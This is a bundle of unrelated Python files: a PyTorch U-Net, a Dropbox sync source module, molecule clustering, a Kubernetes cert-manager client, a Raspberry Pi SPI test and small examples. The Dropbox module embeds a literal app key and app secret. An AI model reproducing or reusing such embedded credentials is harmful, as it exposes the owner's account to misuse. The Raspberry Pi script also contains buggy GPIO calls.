WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import numpy as np
gravity = 9.80665 # Earth-surface gravitational acceleration (m/s**2)
rad_to_deg = 180. / np.pi
deg_to_rad = np.pi / 180.
ft2m = 0.3048 # feet to meter
mtft = 3.2808399 # meter to feet
kt2m_s = 0.5144444
Nm2m = 1852
###
# "Awesome" breaking model
mu_r = 0.02 # Rolling friction coefficient
mu_b = 0.6 # Breaking friction coefficient
nr_solver_conf = {}
nr_solver_conf['eps'] = 10**-5
nr_solver_conf['stop_residual'] = 10**-7
nr_solver_conf['max_ite'] = 20
nr_solver_conf['relax_factor'] = 0.95
|
'''
Created on May 21, 2018
@author: helrewaidy
'''
# sub-parts of the U-Net model
import torch
import torch.nn as nn
import torch.nn.functional as F
class double_conv(nn.Module):
'''(conv => ReLU => BN) * 2'''
def __init__(self, in_ch, out_ch):
super(double_conv, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch, affine=True), #, affine=False
nn.ReLU(inplace=True),
nn.Conv2d(out_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch, affine=True), #, affine=False
nn.ReLU(inplace=True)
)
def forward(self, x):
x = self.conv(x)
return x
class down_conv(nn.Module):
def __init__(self, in_ch):
super(down_conv, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_ch, in_ch, [3,3],stride=(2,2), padding=1),
nn.BatchNorm2d(in_ch, affine=True),
nn.ReLU(inplace=True),
)
def forward(self, x):
x = self.conv(x)
return x
class inconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(inconv, self).__init__()
self.conv = double_conv(in_ch, out_ch)
def forward(self, x):
x = self.conv(x)
return x
class down(nn.Module):
def __init__(self, in_ch, out_ch):
super(down, self).__init__()
self.down_conv = down_conv(in_ch)
self.double_conv = double_conv(in_ch, out_ch)
def forward(self, x):
down_x = self.down_conv(x)
x = self.double_conv(down_x)
return x, down_x
class bottleneck(nn.Module):
def __init__(self, in_ch, out_ch, residual_connection=True):
super(bottleneck, self).__init__()
self.residual_connection = residual_connection
self.down_conv = down_conv(in_ch)
self.double_conv = nn.Sequential(
nn.Conv2d(in_ch, 2*in_ch, 3, padding=1),
nn.BatchNorm2d(2*in_ch, affine=True),
nn.ReLU(inplace=True),
nn.Conv2d(2*in_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch, affine=True),
nn.ReLU(inplace=True)
)
def forward(self, x):
down_x = self.down_conv(x)
if self.residual_connection:
x = self.double_conv(down_x) + down_x
else:
x = self.double_conv(down_x)
return x
class up(nn.Module):
def __init__(self, in_ch, out_ch, bilinear=True):
super(up, self).__init__()
self.up = nn.UpsamplingBilinear2d(scale_factor=2)
self.conv = nn.Sequential(
nn.Conv2d(in_ch * 2, in_ch, 3, padding=1),
nn.BatchNorm2d(in_ch, affine=True), #, affine=False
nn.ReLU(inplace=True),
nn.Conv2d(in_ch , out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch, affine=True),
nn.ReLU(inplace=True)
)
def forward(self, x1, x2):
x1 = self.up(x1)
diffX = x1.size()[2] - x2.size()[2]
diffY = x1.size()[3] - x2.size()[3]
x2 = F.pad(x2, (diffX // 2, int(diffX / 2),
diffY // 2, int(diffY / 2)))
x = torch.cat([x2, x1], dim=1)
x = self.conv(x)
return x
class mag_phase_combine(nn.Module):
def __init__(self, in_ch, out_ch):
super(mag_phase_combine, self).__init__()
self.conv1d = nn.Sequential(
nn.Conv2d(in_ch, out_ch, [1, 1], padding=(0,0))
)
def forward(self, x):
t = torch.split(x, int(x.size()[2]/2), dim=2)
xt = [i for i in t]
x1 = xt[0]
x2 = xt[1]
x = torch.cat([x1, x2], dim=1)
x = self.conv1d(x)
return x
class outconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(outconv, self).__init__()
self.conv = nn.Conv2d(in_ch, out_ch, [1, 1])
def forward(self, x):
x = self.conv(x)
return x
|
import os, json, shutil, glob, calendar, codecs, fnmatch, re, unicodedata, errno
from abc import ABCMeta, abstractmethod
from datetime import datetime
from threading import Thread
from collections import Iterable
from stat import *
from inspect import isclass, getmembers
from sys import modules
# Include the Dropbox SDK libraries
import dropbox
from dropbox import Dropbox, DropboxOAuth2FlowNoRedirect, files
from witica.util import Event, KillableThread, sstr, suni, throw, get_cache_folder
from witica import *
from witica.log import *
from witica.metadata import extractor
cache_folder = get_cache_folder("Source")
class Source(Loggable):
"""Abstract source class representing any storage containing items"""
__metaclass__ = ABCMeta
def __init__(self, source_id, config, prefix = ""):
self.source_id = source_id
self.prefix = prefix
self.items = SourceItemList(self)
self.log_id = source_id
self.changeEvent = Event()
self.cursorEvent = Event()
self.stoppedEvent = Event()
self.continuous = True
self._stop = TEvent()
self.worker_thread = Thread(target=self.work, name=self.source_id)
if config["version"] != 1:
raise IOError("Version of source config file is not compatible. Must be 1 but is " + str(config["version"]) + ".")
def start_update(self, continuous=True):
self.continuous = continuous
self.worker_thread.start()
def work(self):
self.log("Sourcing thread started.", Logtype.DEBUG)
if self.continuous == False: #fetch changes only once
try:
cursor = self.fetch_changes(self.changeEvent, self.state["cursor"])
if not(cursor == None):
self.state["cursor"] = cursor
self.cursorEvent(self,self.state["cursor"])
self.write_state()
except Exception, e:
self.log_exception("Fetching changes failed.", Logtype.ERROR)
else: #fetch changes continously
while not self._stop.is_set():
self.update_change_status()
if self._stop.is_set(): break
if self.changes_available:
try:
cursor = self.fetch_changes(self.changeEvent, self.state["cursor"])
if cursor:
self.state["cursor"] = cursor
self.cursorEvent(self,self.state["cursor"])
self.write_state()
except Exception, e:
self.log_exception("Fetching changes failed.", Logtype.ERROR)
self.stoppedEvent(self,None)
self.log("Worker thread stopped.", Logtype.DEBUG)
def stop(self):
self._stop.set()
def get_item_id(self,path):
return path.split(".")[0].split("@")[0] #id is the path until first @ or .
def item_exists(self,item_id):
return SourceItem(self,item_id).exists
def resolve_reference(self, reference, item, allow_patterns = False):
reference = reference.lower()
if re.match(extractor.RE_ITEM_REFERENCE, reference):
itempattern = SourceItemList.absolute_itemid(reference[1:], item)
if allow_patterns:
matching_items = self.items.get_items(itempattern)
if len(matching_items) > 0:
matching_item_ids = [item.item_id for item in matching_items]
if len(matching_item_ids) == 1:
return matching_item_ids[0]
else:
return matching_item_ids
else:
return itempattern
else:
return itempattern
else:
raise ValueError("'" + reference + "' is not a valid reference")
def get_local_path(self, absolutepath):
if absolutepath.startswith(self.get_absolute_path("")):
i = len(self.get_absolute_path(""))
return absolutepath[i+1:]
else:
raise ValueError("'" + absolutepath + "'' is no valid absolute path inside the source '" + self.source_id + "'.")
@staticmethod
def construct_from_json (source_id, config, prefix = ""):
classes = Source.get_classes()
instance = classes[config["type"]](source_id, config, prefix)
return instance
@staticmethod
def construct_from_file(filename):
#load source file
try:
source_id = os.path.split(filename)[1].rsplit(".")[0]
config = json.loads(codecs.open(filename, "r", "utf-8").read())
return Source.construct_from_json(source_id, config)
except Exception as e:
throw(IOError, "Loading source config file '" + sstr(filename) + "' failed", e)
@staticmethod
def construct_from_working_dir():
source_dir = os.getcwd()
if source_dir.find(os.sep + "Dropbox" + os.sep) > -1:
prefix = ""
while not(Source.is_source_dir(source_dir)) and source_dir.find(os.sep) > -1:
prefix = prefix + source_dir.rpartition(os.sep)[2] + "/"
source_dir = source_dir.rpartition(os.sep)[0]
if Source.is_source_dir(source_dir):
folder = source_dir.partition(os.sep + "Dropbox")[2]
config = {}
config["version"] = 1
config["type"] = "DropboxFolder"
config["app_key"] = "fgpviq15t751f6n"
config["app_secret"] = "e4auyq6wzrz04p6"
config["folder"] = folder.decode("utf-8")
return Source.construct_from_json(folder.replace(os.sep, "__").decode("utf-8").encode("ascii", "ignore"), config, prefix = prefix)
else:
raise IOError("Working directory is not a valid source. Must contain /meta directory.")
else:
raise IOError("Working directory is not a valid source. Must be a folder inside your Dropbox.")
@staticmethod
def is_source_dir(source_dir):
if source_dir.find(os.sep + "Dropbox" + os.sep) > -1 \
and os.path.exists(source_dir + os.sep + "meta") \
and os.path.isdir(source_dir + os.sep + "meta"):
return True
else:
return False
@staticmethod
def get_classes():
classes = {}
for name, obj in getmembers(modules[__name__]):
if isclass(obj):
classes[name] = obj
return classes
@abstractmethod
def update_cache(self):
pass
@abstractmethod
def update_change_status(self):
pass
@abstractmethod
def fetch_changes(self):
pass
@abstractmethod
def get_abs_meta_filename(self, local_filename):
pass
@abstractmethod
def get_absolute_path(self, local_path):
pass
class DropboxSource(Source):
doc = "Dropbox folder containing a witica source"
__metaclass__ = ABCMeta
def __init__(self, source_id, config, prefix = ""):
super(DropboxSource, self).__init__(source_id, config, prefix)
self.source_dir = cache_folder + os.sep + self.source_id
self.state_filename = cache_folder + os.sep + self.source_id + ".source"
self.app_key = config["app_key"]
self.app_secret = config["app_secret"]
def start_session(self):
self.state = {}
self.load_state()
try:
self.dbx = Dropbox(self.state["access_token"])
except Exception, e:
try:
self.link()
self.dbx = Dropbox(self.state["access_token"])
except Exception, e1:
throw(IOError, "Could not get access to Dropbox. OAuth failed.", e1)
self.log("Initialized source.", Logtype.DEBUG)
def load_state(self):
if os.path.isfile(self.state_filename):
self.state = json.loads(codecs.open(self.state_filename, "r", "utf-8").read())
if self.state["version"] == 1:
#migrate from state version 1
#upgrade to drobpox api v2 / remove old token data from state
self.log("Upgrading to Dropbox API v2. You will be asked to grant access again.", Logtype.WARNING)
self.state.pop("token_key", None)
self.state.pop("token_secret", None)
self.state["version"] = 2
if self.state["version"] != 2:
raise IOError("Version of source state file is not compatible. Should be 2 but is " + str(self.state["version"]) + ".")
if "cache_cursor" in self.state:
self.cache_cursor = self.state["cache_cursor"]
else:
self.cache_cursor = ""
else:
self.state["version"] = 2
self.state["cursor"] = ""
self.state["cache_cursor"] = ""
self.cache_cursor = ""
def write_state(self):
self.state["cache_cursor"] = self.cache_cursor
if not(os.path.isdir(self.source_dir)):
os.makedirs(self.source_dir)
s = json.dumps(self.state, indent=3, encoding="utf-8") + "\n"
f = codecs.open(self.state_filename, "w", encoding="utf-8")
f.write(s)
f.close()
self.load_state()
def link(self):
auth_flow = DropboxOAuth2FlowNoRedirect(self.app_key, self.app_secret)
url = auth_flow.start()
Logger.get_printlock().acquire()
try:
print "url:", url
print "Please authorize in the browser. After you're done, copy and paste the authorization code and press enter."
auth_code = raw_input("Enter the authorization code here: ").strip()
except Exception as e:
raise e
finally:
Logger.get_printlock().release()
try:
oauth_result = auth_flow.finish(auth_code)
except Exception, e:
self.log_exception("Dropbox authorization failed.", Logtype.ERROR)
raise e
self.state["access_token"] = oauth_result.access_token
self.write_state()
def update_cache(self):
if os.path.isdir(self.source_dir):
try:
delta = self.dbx.files_list_folder_continue(self.cache_cursor)
except Exception as e:
self.log_exception("Could not use delta. Trying to rebuild the cache.", Logtype.WARNING)
shutil.rmtree(self.source_dir)
os.makedirs(self.source_dir)
delta = self.dbx.files_list_folder(path = self.path_prefix if not self.path_prefix == "" else None, recursive=True)
else:
os.makedirs(self.source_dir)
delta = self.dbx.files_list_folder(path = self.path_prefix if not self.path_prefix == "" else None, recursive=True)
if self._stop.is_set(): return
#update cache
filecount = 0
for metadata in delta.entries:
path = unicodedata.normalize("NFC",unicode(metadata.path_lower))
if path.startswith(self.path_prefix):
path = path[len(self.path_prefix):]
if isinstance(metadata, files.DeletedMetadata): #deleted file or directory
if os.path.exists(self.source_dir + path):
if os.path.isdir(self.source_dir + path):
try:
shutil.rmtree(self.source_dir + path)
except Exception, e:
if not(e.errno == errno.ENOENT): #don't treat as error, if file didn't exist
self.log_exception("Directory '" + self.source_dir + path + "' in source cache could not be removed.", Logtype.WARNING)
else:
try:
os.remove(self.source_dir + path)
except Exception, e:
if not(e.errno == errno.ENOENT): #don't treat as error, if file didn't exist
self.log_exception("File '" + self.source_dir + path + "' in source cache could not be removed.", Logtype.WARNING)
elif isinstance(metadata, files.FolderMetadata): #directory
if not(os.path.exists(self.source_dir + path)):
try:
os.makedirs(self.source_dir + path)
except Exception, e:
self.log_exception("Directory '" + self.source_dir + path + "' in source cache could not be created.", Logtype.ERROR)
elif isinstance(metadata, files.FileMetadata): #new/changed file
self.log("Downloading '" + path + "'...", Logtype.DEBUG)
try:
#download file
self.dbx.files_download_to_file(self.source_dir + path, self.path_prefix + path)
#set modified time
try:
mtime = calendar.timegm(metadata.server_modified.timetuple())
st = os.stat(self.source_dir + path)
atime = st[ST_ATIME]
os.utime(self.source_dir + path,(atime,mtime))
except Exception, e:
self.log_exception("The original modification date of file '" + sstr(path) + "' couldn't be extracted. Using current time instead.", Logtype.WARNING)
filecount += 1
except Exception, e:
self.log_exception("Downloading '" + sstr(self.path_prefix + path) + "' failed (skipping file).", Logtype.ERROR)
if self._stop.is_set(): return
self.cache_cursor = delta.cursor
self.write_state()
if delta.has_more:
self.update_cache()
self.log("Cache updated. Updated files: " + sstr(filecount), Logtype.DEBUG)
def update_change_status(self):
self.changes_available = False
t = KillableThread(target=self.update_change_status_blocking, name=self.source_id + " Dropbox (longpoll)")
t.start()
while t.isAlive():
if self._stop.is_set():
try:
t.kill()
except Exception, e:
self.log_exception(e)
pass
t.join(1)
def update_change_status_blocking(self):
if self.state["cursor"]:
try:
delta = self.dbx.files_list_folder_longpoll(self.state["cursor"],30)
self.changes_available = delta.changes
except Exception, e:
self.changes_available = False
else:
self.changes_available = True
def fetch_changes(self,change_event, cursor=None):
global cache_folder
self.update_cache()
if self._stop.is_set(): return
self.log("Fetching changes...", Logtype.DEBUG)
if cursor == "":
cursor = None
if cursor != None:
delta = self.dbx.files_list_folder_continue(cursor)
else:
delta = self.dbx.files_list_folder(path = self.path_prefix if not self.path_prefix == "" else None, recursive=True)
#fire change events
for metadata in delta.entries:
path = unicodedata.normalize("NFC", unicode(metadata.path_lower))
if path.startswith(self.path_prefix):
path = path[len(self.path_prefix):]
if path.startswith("/"):
path = path[1:]
if isinstance(metadata, files.FileMetadata) or isinstance(metadata, files.DeletedMetadata):
if re.match(extractor.RE_METAFILE, path): #site metadata change
self.log("Metafile changed: " + sstr(path), Logtype.INFO)
change_event(self,MetaChanged(self,path.partition("meta/")[2]))
elif re.match(extractor.RE_ITEMFILE, path):
item = SourceItem(self, self.get_item_id(path))
if item.exists:
self.log("Item changed: " + sstr(path), Logtype.INFO)
change_event(self,ItemChanged(self, self.get_item_id(path), path))
else:
self.log("Item removed: " + sstr(path), Logtype.INFO)
change_event(self,ItemRemoved(self, self.get_item_id(path)))
elif isinstance(metadata, files.FileMetadata):
self.log("File '" + path + "' is not supported and will be ignored. Filenames containing '@' are currently not supported.", Logtype.WARNING)
if self._stop.is_set(): return
cursor = delta.cursor
if delta.has_more:
cursor = self.fetch_changes(change_event, delta.cursor)
return cursor
def get_abs_meta_filename(self, local_filename):
return self.get_absolute_path(os.path.join('meta' + os.sep + local_filename))
def get_absolute_path(self, localpath):
return os.path.abspath(os.path.join(self.source_dir, localpath))
class DropboxAppFolder(DropboxSource): #TODO: remove (legacy)
def __init__(self, source_id, config, prefix = ""):
super(DropboxAppFolder, self).__init__(source_id, config, prefix)
self.path_prefix = ""
self.start_session()
class DropboxFolder(DropboxSource):
def __init__(self,source_id,config, prefix = ""):
super(DropboxFolder, self).__init__(source_id, config, prefix)
self.path_prefix = unicodedata.normalize("NFC",config["folder"].lower())
self.start_session()
class SourceItemList(object):
"""An iteratable that allows to access all items in a source"""
def __init__(self, source):
self.source = source
def __getitem__(self,key):
if isinstance(key, basestring):
if self.source.item_exists(key):
return SourceItem(self.source, key)
else:
raise(KeyError("An item with id '" + key + "' does not exist in source '" + self.source.source_id + "'."))
else:
raise(TypeError("The type '" + key.__class__.__name__ + "'' is not supported. Use 'str' instead to access items."))
def __len__(self):
count = 0
for item in self:
count += 1
return count
def __iter__(self):
for root, dirs, files in os.walk(self.source.get_absolute_path(""), topdown=True):
last_item_id = ""
for filename in files:
local_path = self.source.get_local_path(os.path.join(root,filename))
item_id = re.match(extractor.RE_ITEM_SPLIT_ITEMID_EXTENSION, local_path)
if item_id:
item_id = item_id.group(1)
if self.source.item_exists(item_id) and item_id != last_item_id: #only yield valid items and only once
yield SourceItem(self.source, item_id)
last_item_id = item_id
@staticmethod
def match(pattern, itemid):
"""checks if an itemid matches a specific itemid pattern (that can contain *, ** or ? as placeholders"""
tokenized = re.split(r"(\*\*|\*|\?)", pattern)
regex = ""
for token in tokenized:
if token == "**": #matches all character sequences
regex += "[\s\S]*"
elif token == "*": #matches all character sequences that don't contain /
regex += "[^\/]*"
elif token == "?": #matches any single character
regex += "[\s\S]"
else: #escape the remaining strings
regex += re.escape(token)
if re.match("^" + regex + "$", itemid):
return True
else:
return False
@staticmethod
def absolute_itemid(relative_itemid, current_item):
relative_itemid = relative_itemid.lower()
if relative_itemid.startswith("./"): #expand relative item id
prefix = current_item.item_id.rpartition("/")[0]
if prefix != "":
return prefix + "/" + relative_itemid[2:]
else:
return relative_itemid[2:]
else:
return relative_itemid
def get_items(self, itemidpattern):
"""Returns all items where the itemid expression matches. The expression can contain * as placeholder."""
return [item for item in self if SourceItemList.match(itemidpattern, item.item_id)]
class SourceItem(Loggable):
"""Represents an item in a source"""
def __init__(self, source, item_id):
self.source = source
self.item_id = item_id
self.log_id = self.source.source_id + "!" + item_id
def _get_all_filenames(self):
absolute_paths = glob.glob(self.source.get_absolute_path(self.item_id + ".*")) + glob.glob(self.source.get_absolute_path(self.item_id + "@*"))
local_paths = [self.source.get_local_path(abspath) for abspath in absolute_paths]
return [local_path for local_path in local_paths if re.match(extractor.RE_ITEMFILE, local_path)]
def _get_itemfile(self):
item_filetypes = [ext for (ext,extr) in extractor.registered_extractors] #item file is the one exisiting first from this list
for filetype in item_filetypes:
filename = self.item_id + "." + filetype
if os.path.isfile(self.source.get_absolute_path(filename)):
return filename
return None #item does not exist
def _exists(self):
return not(self.itemfile == None)
def _get_contentfile(self):
content_filetypes = [".md", ".txt", ".png", ".jpg"] #item file is the one exisiting first from this list
for filetype in content_filetypes:
filename = self.item_id + filetype
if os.path.isfile(self.source.get_absolute_path(filename)):
return filename
return None #item does not exist
def _get_content_filenames(self):
contentfiles = self.files
itemfile = self.item_id + ".item"
if contentfiles.count(itemfile):
contentfiles.remove(itemfile)
return contentfiles
def _get_mtime(self):
return max([os.path.getmtime(self.source.get_absolute_path(filename)) for filename in self.files])
def get_metadata(self, strict = False):
metadata = {}
#general metadata
metadata["last-modified"] = self.mtime
#content file metadata
if self.contentfile and self.contentfile != self.itemfile:
ext = re.match(extractor.RE_ITEM_SPLIT_ITEMID_EXTENSION, self.contentfile).group(2)
if extractor.is_supported(ext):
try:
metadata.update(extractor.extract_metadata(self.source.get_absolute_path(self.contentfile)))
except Exception, e:
if not strict:
self.log_exception("No metadata extracted from file '" + self.contentfile + "'.", Logtype.WARNING)
else:
throw(ValueError, "No metadata extracted from file '" + self.contentfile + "'.", e)
#item file metadata
metadata.update(extractor.extract_metadata(self.source.get_absolute_path(self.itemfile)))
metadata = self.postprocess_metadata(metadata)
return metadata
def postprocess_metadata(self, metadata):
if isinstance(metadata, basestring):
if re.match(extractor.RE_ITEM_REFERENCE, metadata):
matching_item_ids = self.source.resolve_reference(metadata,self,allow_patterns=True)
if isinstance(matching_item_ids, list):
return ["!" + item_id for item_id in matching_item_ids]
else:
return "!" + matching_item_ids #only one id
else:
return metadata
elif isinstance(metadata, list):
l = []
for x in metadata:
processed = self.postprocess_metadata(x)
if isinstance(x, basestring) and isinstance(processed, list):
l.extend(processed) #if item pattern was extended to multiple item ids extend list
else:
l.append(processed)
return l
elif isinstance(metadata, dict):
return {k: self.postprocess_metadata(v) for k,v in metadata.items()}
else:
return metadata
files = property(_get_all_filenames)
itemfile = property(_get_itemfile)
exists = property(_exists)
contentfile = property(_get_contentfile)
contentfiles = property(_get_content_filenames)
mtime = property(_get_mtime)
metadata = property(get_metadata)
class IncrementalChange:
"""Abstract class representing an incrental change in source"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, source, item_id):
self.source = source
self.item_id = item_id
class MetaChanged(IncrementalChange):
def __init__(self, source, filename):
super(MetaChanged, self).__init__(source,filename)
def __str__(self):
return "<MetaChanged " + sstr(self.item_id) + ">"
class ItemChanged(IncrementalChange):
def __init__(self, source, item_id, filename):
super(ItemChanged, self).__init__(source,item_id)
self.filename = filename
def _getitem(self):
return self.source.items[self.item_id]
def __str__(self):
return "<ItemChanged " + sstr(self.item_id) + ">"
item = property(_getitem)
class ItemRemoved(IncrementalChange):
def __init__(self, source, item_id):
super(ItemRemoved, self).__init__(source,item_id)
def __str__(self):
return "<ItemRemoved " + sstr(self.item_id) + ">"
|
import logging
import numpy as np
from openeye import oechem, oegraphsim
from sklearn.cluster import DBSCAN
logger = logging.getLogger(__name__)
def cluster_similar_molecules(
smiles, fingerprint_type=oegraphsim.OEFPType_Tree, eps=0.5, min_samples=2
):
"""The method attempts to cluster a sets of molecules based on their
similarity using a Tanimoto distance metric and the `sklearn` DBSCAN
clustering code.
Notes
-----
This is based on the code by David Mobley:
https://github.com/openforcefield/release-1-benchmarking/blob/master/QM_molecule_selection/divide_sets.ipynb
Parameters
----------
smiles: list of str
The SMILES representations of the molecules to cluster.
fingerprint_type
The type of molecular fingerprint to use.
eps: float
The `eps` parameter to pass as an argument to DBSCAN while clustering.
min_samples: int
The `min_samples` parameter to pass as an argument to DBSCAN while
clustering.
Returns
-------
dict of str and list of str
The clustered SMILES patterns.
"""
assert isinstance(smiles, list)
# Build fingerprints
fingerprints = {}
for smiles_pattern in smiles:
oe_molecule = oechem.OEMol()
oechem.OEParseSmiles(oe_molecule, smiles_pattern)
fingerprint = oegraphsim.OEFingerPrint()
oegraphsim.OEMakeFP(fingerprint, oe_molecule, fingerprint_type)
fingerprints[smiles_pattern] = fingerprint
# Build a similarity matrix
distance_matrix = np.zeros((len(smiles), len(smiles)))
for i, smiles_i in enumerate(smiles):
for j, smiles_j in enumerate(smiles):
if i == j:
continue
distance_matrix[i, j] = 1.0 - oegraphsim.OETanimoto(
fingerprints[smiles_i], fingerprints[smiles_j]
)
# Cluster the data
clustering = DBSCAN(eps=eps, min_samples=min_samples, metric="precomputed")
clustered_smiles = clustering.fit(distance_matrix)
labels = clustered_smiles.labels_
smiles_by_cluster = {}
for label in set(labels):
smiles_by_cluster[label] = [
smiles[i] for i, x in enumerate(labels) if x == label
]
return smiles_by_cluster
|
n = int(input('Digite um número: '))
print('TABUADA')
for c in range (1, 11):
print(f'{n} x {c} = {n*c}')
|
import typing
from fiepipelib.gitaspect.routines.config import GitAspectConfigurationRoutines
from fiepipelib.rootaspect.data.config import RootAsepctConfiguration
TR = typing.TypeVar("TR", bound=RootAsepctConfiguration)
class RootAspectConfigurationRoutines(GitAspectConfigurationRoutines[TR], typing.Generic[TR]):
pass
|
# Matt Grimm
# USAFA
# Wireless nRF24L01+ Wireless Communication
# 7 November 2016
import RPi.GPIO as GPIO
import time
import sys,signal
import spidev
GPIO.setmode(GPIO.BCM)
GPIO.setup(11,GPIO.IN)
rx_buf = [8]
int_step = 0
def signal_handler(signal,frame):
print("\nprogram exiting")
GPIO.cleanup()
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
def my_callback(channel):
GPIO.setmode(GPIO.BCM) # Not sure why I have to redo this part....???
GPIO.setup(9,GPIO.IN)
global int_step
print(str(GPIO.IN(9)))
rx_buf[int_step] = GPIO.input(9)
int_step+=1
if(int_step==9):
int_step = 0
GPIO.add_event_detect(11,GPIO.RISING,callback=my_callback)
# sourceforge.net/p/raspberry-gpio-python/wiki/Inputs
# Has actually corroputed pi memory before... Solution was to restart.
# Might actually be just messing up SPI config by messing with GPI and MISO pin.
spi = spidev.SpiDev()
spi.open(0,0) #bus,device
spi2 = spidev.SpiDev()
spi2.open(1,1) # open SPI1 CE1
# Had to do a lot to use SP1. Needed to change hardware overlay and add
# spi-cs3 to use spi1. Also, had to disable bluetooth because its overlay interferes with
# spi1. raspberrypi.org/forums/viewtopic.php?f=29&t=146291
spi2.max_speed_hz = 7629
spi.max_speed_hz = 7629
# For testing purposes, I am connecting SPI0 MOSI to SPI1 MISO right now.
#while True:
spi.xfer([0xAA])
spi.close()
spi2.close()
GPIO.cleanup()
|
# step 1: imports
from typing import Generic, TypeVar
# step 2: define generic types to be specified later
T1 = TypeVar("T1")
T2 = TypeVar("T2")
# step 3: define generic class
class MyGenericClass(Generic[T1, T2]):
def do_something(self, value1: T1, value2: T2):
print(f"doing something with {value1} and {value2}")
# step 4: specify generic types and use the class!
o = MyGenericClass[str, int]()
# will print "doing something with hello and 42"
o.do_something("hello", 42)
# will print "doing something with 42 and hello" but type checker will fail: your code is safe with type checker
o.do_something(42, "hello")
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from kubernetes.client.api_client import ApiClient
from kubernetes.client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class CertManagerIoV1alpha3Api(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_cluster_issuer(self, body, **kwargs): # noqa: E501
"""create_cluster_issuer # noqa: E501
create a ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_issuer(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_cluster_issuer_with_http_info(body, **kwargs) # noqa: E501
def create_cluster_issuer_with_http_info(self, body, **kwargs): # noqa: E501
"""create_cluster_issuer # noqa: E501
create a ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_issuer_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
